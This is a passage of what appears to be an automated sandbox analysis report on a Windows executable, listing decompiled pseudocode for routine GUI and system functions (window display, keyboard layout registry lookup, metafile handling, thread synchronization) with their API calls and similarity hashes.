                                                                                				SetWindowPos(E0043BD14(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                                				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x46b8cc != 0) {
                                                                                					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                                					if(_v12 != 0) {
                                                                                						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                                						if(_v12 == 0) {
                                                                                							E004404B4( &_v36);
                                                                                							if(_v32 <= _v24) {
                                                                                							}
                                                                                						}
                                                                                						 *0x46b8cc(E0043BD14(_v8), 0x64,  *0x0046B9D4 | 0x00040000);
                                                                                					}
                                                                                				}
                                                                                				ShowWindow(E0043BD14(_v8), 4);
                                                                                				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                				_pop(_t129);
                                                                                				 *[fs:eax] = _t129;
                                                                                				_push(0x43d42e);
                                                                                				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                                				_t85 = _v8;
                                                                                				 *((char*)(_t85 + 0x210)) = 0;
                                                                                				return _t85;
                                                                                			}
















                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D345
                                                                                • GetTickCount.KERNEL32 ref: 0043D34A
                                                                                • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D385
                                                                                • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D39D
                                                                                • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D3E3
                                                                                • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D3F4
                                                                                • GetTickCount.KERNEL32 ref: 0043D40E
                                                                                  • Part of subcall function 004404B4: GetCursorPos.USER32(?), ref: 004404B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                • String ID:
                                                                                • API String ID: 3024527889-0
                                                                                • Opcode ID: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction ID: 893ef75b31aebc2a37a936a1955b57e4fbaaa27f92c468afc2ea37a70f40a7ca
                                                                                • Opcode Fuzzy Hash: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction Fuzzy Hash: BB517574A00109EFDB10DFA9C982A9EB7F4EF49304F204466F940E7391D779AE40CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00453434(intOrPtr __eax, void* __ebx) {
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				void* _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				struct HKL__* _v280;
                                                                                				char _v536;
                                                                                				char _v600;
                                                                                				char _v604;
                                                                                				char _v608;
                                                                                				char _v612;
                                                                                				void* _t60;
                                                                                				intOrPtr _t106;
                                                                                				intOrPtr _t111;
                                                                                				void* _t117;
                                                                                				void* _t118;
                                                                                				intOrPtr _t119;
                                                                                
                                                                                				_t117 = _t118;
                                                                                				_t119 = _t118 + 0xfffffda0;
                                                                                				_v612 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t117);
                                                                                				_push(0x4535df);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t119;
                                                                                				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                                					L11:
                                                                                					_pop(_t106);
                                                                                					 *[fs:eax] = _t106;
                                                                                					_push(0x4535e6);
                                                                                					return E00404320( &_v612);
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
                                                                                					E00404320(_v8 + 0x38);
                                                                                					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                                					if(_t60 < 0) {
                                                                                						L10:
                                                                                						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                                						E00415F54( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_v20 = _t60 + 1;
                                                                                						_v24 =  &_v280;
                                                                                						do {
                                                                                							if(E00440924( *_v24) == 0) {
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_v608 =  *_v24;
                                                                                								_v604 = 0;
                                                                                								if(RegOpenKeyExA(0x80000002, E00409220( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
                                                                                									goto L9;
                                                                                								} else {
                                                                                									_push(_t117);
                                                                                									_push(0x45359b);
                                                                                									_push( *[fs:eax]);
                                                                                									 *[fs:eax] = _t119;
                                                                                									_v12 = 0x100;
                                                                                									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                                										E00404588( &_v612, 0x100,  &_v536);
                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                                										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                                											E00404588(_v8 + 0x38, 0x100,  &_v536);
                                                                                										}
                                                                                									}
                                                                                									_pop(_t111);
                                                                                									 *[fs:eax] = _t111;
                                                                                									_push(0x4535a2);
                                                                                									return RegCloseKey(_v16);
                                                                                								}
                                                                                							}
                                                                                							goto L12;
                                                                                							L9:
                                                                                							_v24 = _v24 + 4;
                                                                                							_t38 =  &_v20;
                                                                                							 *_t38 = _v20 - 1;
                                                                                						} while ( *_t38 != 0);
                                                                                						goto L10;
                                                                                					}
                                                                                				}
                                                                                				L12:
                                                                                			}




















                                                                                0x00453586
                                                                                0x00453589
                                                                                0x0045358c
                                                                                0x0045359a
                                                                                0x0045359a
                                                                                0x004534f9
                                                                                0x00000000
                                                                                0x004535a2
                                                                                0x004535a2
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x00000000
                                                                                0x004534a5
                                                                                0x00453492
                                                                                0x00000000

                                                                                APIs
                                                                                • GetKeyboardLayoutList.USER32(00000040,?,00000000,004535DF,?,022E0F1C,?,00453641,00000000,?,00437C4F), ref: 0045348A
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534F2
                                                                                • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 0045352C
                                                                                • RegCloseKey.ADVAPI32(?,004535A2,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 00453595
                                                                                Strings
                                                                                • layout text, xrefs: 00453523
                                                                                • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004534DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                • API String ID: 1703357764-2652665750
                                                                                • Opcode ID: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction ID: 8d878b3f35002f07d186a4d1dffd632d93ff78f37112a753d71399f72f713053
                                                                                • Opcode Fuzzy Hash: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction Fuzzy Hash: 80414C74A0020DAFDB10DF55C981B9EB7F8EB48305F5144A6E904A7352E738AF44DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00422900(void* __eax, void* __edx) {
                                                                                				BYTE* _v8;
                                                                                				int _v12;
                                                                                				struct HDC__* _v16;
                                                                                				short _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				char _v38;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				signed int _t35;
                                                                                				void* _t66;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t78;
                                                                                				void* _t81;
                                                                                				void* _t84;
                                                                                				void* _t86;
                                                                                				intOrPtr _t87;
                                                                                
                                                                                				_t84 = _t86;
                                                                                				_t87 = _t86 + 0xffffffdc;
                                                                                				_t81 = __edx;
                                                                                				_t66 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					E00402EC8( &_v38, 0x16);
                                                                                					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                                                                                					_v38 = 0x9ac6cdd7;
                                                                                					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                                                                                					if(_t35 != 0) {
                                                                                						_v24 = _t35;
                                                                                					} else {
                                                                                						_v24 = 0x60;
                                                                                					}
                                                                                					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                                                					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                                                					_v18 = E00420F04( &_v38);
                                                                                					_v16 = GetDC(0);
                                                                                					_push(_t84);
                                                                                					_push(0x422a3b);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t87;
                                                                                					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                                                                                					_v8 = E0040272C(_v12);
                                                                                					_push(_t84);
                                                                                					_push(0x422a1b);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t87;
                                                                                					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                                                						E00420114(_t68);
                                                                                					}
                                                                                					E00416268(_t81, 0x16,  &_v38);
                                                                                					E00416268(_t81, _v12, _v8);
                                                                                					_pop(_t78);
                                                                                					 *[fs:eax] = _t78;
                                                                                					_push(E00422A22);
                                                                                					return E0040274C(_v8);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422952
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422969
                                                                                • GetDC.USER32(00000000), ref: 00422980
                                                                                • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00422A3B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004229A4
                                                                                • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00422A1B,?,?,00000000,00000000,00000008,?,00000000,00422A3B), ref: 004229D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: BitsFileMeta
                                                                                • String ID: `
                                                                                • API String ID: 858000408-2679148245
                                                                                • Opcode ID: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction ID: 2cb1a0d04e077efc4e63360fc705e0fb0881348a5fd4cdbe6f9f670913e1373a
                                                                                • Opcode Fuzzy Hash: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction Fuzzy Hash: 8931A874B00218ABDB00EFD5D982AAEB7B8EF08700F514456F904FB681D6789D40C769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E0041B790() {
                                                                                				char _v5;
                                                                                				intOrPtr* _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				long _t16;
                                                                                				char _t19;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t34;
                                                                                				void* _t39;
                                                                                				intOrPtr _t46;
                                                                                				intOrPtr* _t47;
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t51;
                                                                                				void* _t53;
                                                                                				void* _t55;
                                                                                				void* _t58;
                                                                                				void* _t60;
                                                                                				intOrPtr _t61;
                                                                                
                                                                                				_t58 = _t60;
                                                                                				_t61 = _t60 + 0xfffffff0;
                                                                                				_push(_t39);
                                                                                				_push(_t55);
                                                                                				_push(_t53);
                                                                                				_t16 = GetCurrentThreadId();
                                                                                				_t47 =  *0x486dcc; // 0x487030
                                                                                				if(_t16 !=  *_t47) {
                                                                                					_v20 = GetCurrentThreadId();
                                                                                					_v16 = 0;
                                                                                					_t46 =  *0x486c5c; // 0x41036c
                                                                                					E0040A1A8(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
                                                                                					E00403D80();
                                                                                				}
                                                                                				if( *0x487a00 == 0) {
                                                                                					_v5 = 0;
                                                                                					return _v5;
                                                                                				} else {
                                                                                					_push(0x487a04);
                                                                                					L00406840();
                                                                                					_push(_t58);
                                                                                					_push(0x41b8a6);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t61;
                                                                                					if( *0x46b4b8 == 0) {
                                                                                						L5:
                                                                                						_t19 = 0;
                                                                                					} else {
                                                                                						_t34 =  *0x46b4b8; // 0x0
                                                                                						if( *((intOrPtr*)(_t34 + 8)) > 0) {
                                                                                							_t19 = 1;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                					}
                                                                                					_v5 = _t19;
                                                                                					if(_v5 != 0) {
                                                                                						while(1) {
                                                                                							_t21 =  *0x46b4b8; // 0x0
                                                                                							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t22 =  *0x46b4b8; // 0x0
                                                                                							_v12 = E00413FA4(_t22, 0);
                                                                                							_t24 =  *0x46b4b8; // 0x0
                                                                                							E00413E94(_t24, 0);
                                                                                							 *[fs:eax] = _t61;
                                                                                							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41b859, _t58);
                                                                                							_pop(_t51);
                                                                                							 *[fs:eax] = _t51;
                                                                                							SetEvent( *(_v12 + 4));
                                                                                						}
                                                                                						 *0x487a00 = 0;
                                                                                					}
                                                                                					_pop(_t48);
                                                                                					 *[fs:eax] = _t48;
                                                                                					_push(E0041B8B1);
                                                                                					_push(0x487a04);
                                                                                					L00406988();
                                                                                					return 0;
                                                                                				}
                                                                                			}




























                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B799
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B7A8
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A04,?,?,00000000), ref: 0041B7E3
                                                                                • SetEvent.KERNEL32(?,?,00487A04,?,?,00000000), ref: 0041B877
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A04,0041B8B1,00487A04,?,?,00000000), ref: 0041B8A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                                • String ID: 0pH
                                                                                • API String ID: 130076905-2350025942
                                                                                • Opcode ID: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction ID: 700889da0211f51844b0ff2bdf32a2a153439616f77316e0530eecd999da22f0
                                                                                • Opcode Fuzzy Hash: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction Fuzzy Hash: 183107346042409FD301EF65DC95B9E7BE8EB49704F6184BAE401D77A1C77C9881CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0043D56C(void* __eax) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v16;
                                                                                				intOrPtr* _t14;
                                                                                				intOrPtr* _t17;
                                                                                				char _t19;
                                                                                				intOrPtr* _t21;
                                                                                				void* _t23;
                                                                                				intOrPtr* _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t37;
                                                                                				void* _t39;
                                                                                				intOrPtr _t47;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				intOrPtr _t52;
                                                                                
                                                                                				_t49 = _t51;
                                                                                				_t52 = _t51 + 0xfffffff4;
                                                                                				_t39 = __eax;
                                                                                				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					_t14 =  *0x486b30; // 0x487a94
                                                                                					_t17 =  *0x486b30; // 0x487a94
                                                                                					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                                					_push(_t19);
                                                                                					L00426088();
                                                                                					_v8 = _t19;
                                                                                					_push(_t49);
                                                                                					_push(0x43d62c);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t52;
                                                                                					_t21 =  *0x486dac; // 0x487c00
                                                                                					_t23 = E004536BC( *_t21,  *((short*)(__eax + 0x68)));
                                                                                					_t4 =  &_v8; // 0x43373a
                                                                                					E004260C0( *_t4, _t23);
                                                                                					_t26 =  *0x486dac; // 0x487c00
                                                                                					_t28 = E004536BC( *_t26,  *((short*)(_t39 + 0x68)));
                                                                                					_t6 =  &_v8; // 0x43373a
                                                                                					E004260C0( *_t6, _t28);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_t7 =  &_v8; // 0x43373a
                                                                                					_push( *_t7);
                                                                                					L00426114();
                                                                                					_push( &_v16);
                                                                                					_push(0);
                                                                                					L00426124();
                                                                                					_push(_v12);
                                                                                					_push(_v16);
                                                                                					_push(1);
                                                                                					_t11 =  &_v8; // 0x43373a
                                                                                					_push( *_t11);
                                                                                					L00426114();
                                                                                					_pop(_t47);
                                                                                					 *[fs:eax] = _t47;
                                                                                					_push(0x43d633);
                                                                                					_t12 =  &_v8; // 0x43373a
                                                                                					_t37 =  *_t12;
                                                                                					_push(_t37);
                                                                                					L00426090();
                                                                                					return _t37;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                • 73451AB0.COMCTL32(00000000), ref: 0043D59E
                                                                                  • Part of subcall function 004260C0: 73452140.COMCTL32(:7C,000000FF,00000000,0043D5CE,00000000,0043D62C,?,00000000), ref: 004260C4
                                                                                • 73451680.COMCTL32(:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5F2
                                                                                • 73451710.COMCTL32(00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5FD
                                                                                • 73451680.COMCTL32(:7C,00000001,?,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D610
                                                                                • 73451F60.COMCTL32(:7C,0043D633,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D626
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: 7345173451680$7345171073452140
                                                                                • String ID: :7C
                                                                                • API String ID: 821207058-2842626378
                                                                                • Opcode ID: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction ID: b36cca2bb7ba9923877a37914de756c133afd760673c161dd847c69dd507d15e
                                                                                • Opcode Fuzzy Hash: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction Fuzzy Hash: 11215E74B00214AFDB10EBA8DC82F6D73F8EB49B04F5104AAB914DB291DA75AE44CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00426588(intOrPtr _a4, intOrPtr* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac1 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					_t26 =  *0x487aa8; // 0x426588
                                                                                					 *0x487aa8 = E00426184(5, _t23, _t26, _t27, _t29);
                                                                                					_t24 =  *0x487aa8(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}















                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004265E0
                                                                                • GetSystemMetrics.USER32 ref: 004265F5
                                                                                • GetSystemMetrics.USER32 ref: 00426600
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042662A
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoA
                                                                                • API String ID: 2545840971-1370492664
                                                                                • Opcode ID: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction ID: 4e2d9c879a4ed814bed1cbc42e39869fa7f5999004cea3bfa7235e91a67f31a5
                                                                                • Opcode Fuzzy Hash: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction Fuzzy Hash: 7C11E131704320AFD720CF64AC44BAFF7E8EB05710F51082EED4997680DBB4A9548BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00422F84(int __eax, void* __ecx, intOrPtr __edx) {
                                                                                				intOrPtr _v8;
                                                                                				struct HDC__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				void* _v20;
                                                                                				struct tagRGBQUAD _v1044;
                                                                                				int _t16;
                                                                                				int _t37;
                                                                                				intOrPtr _t44;
                                                                                				void* _t46;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				intOrPtr _t52;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				_t49 = _t51;
                                                                                				_t52 = _t51 + 0xfffffbf0;
                                                                                				_v8 = __edx;
                                                                                				_t46 = __eax;
                                                                                				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                                					L5:
                                                                                					return _t16;
                                                                                				} else {
                                                                                					_t16 = E00420950(_v8, 0xff,  &_v1044);
                                                                                					_t37 = _t16;
                                                                                					if(_t37 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_v12 = GetDC(0);
                                                                                						_v16 = CreateCompatibleDC(_v12);
                                                                                						_v20 = SelectObject(_v16, _t46);
                                                                                						_push(_t49);
                                                                                						_push(0x423033);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t52;
                                                                                						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                                                                                						_pop(_t44);
                                                                                						 *[fs:eax] = _t44;
                                                                                						_push(0x42303a);
                                                                                						SelectObject(_v16, _v20);
                                                                                						DeleteDC(_v16);
                                                                                						return ReleaseDC(0, _v12);
                                                                                					}
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                  • Part of subcall function 00420950: GetObjectA.GDI32(00000000,00000004), ref: 00420967
                                                                                  • Part of subcall function 00420950: GetPaletteEntries.GDI32(00000000,00000000,?,?), ref: 0042098A
                                                                                • GetDC.USER32(00000000), ref: 00422FC2
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00422FCE
                                                                                • SelectObject.GDI32(?), ref: 00422FDB
                                                                                • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423033,?,?,?,?,00000000), ref: 00422FFF
                                                                                • SelectObject.GDI32(?,?), ref: 00423019
                                                                                • DeleteDC.GDI32(?), ref: 00423022
                                                                                • ReleaseDC.USER32 ref: 0042302D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                • String ID:
                                                                                • API String ID: 4046155103-0
                                                                                • Opcode ID: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction ID: cdd620e072040bb66a836ce6190bb65582b2fad91901bccb33566f50f955587f
                                                                                • Opcode Fuzzy Hash: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction Fuzzy Hash: 3D1163B1E00219ABDB10EFE9DC51AAEB7BCEB09344F4144BAF514F7281D67CAE504B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
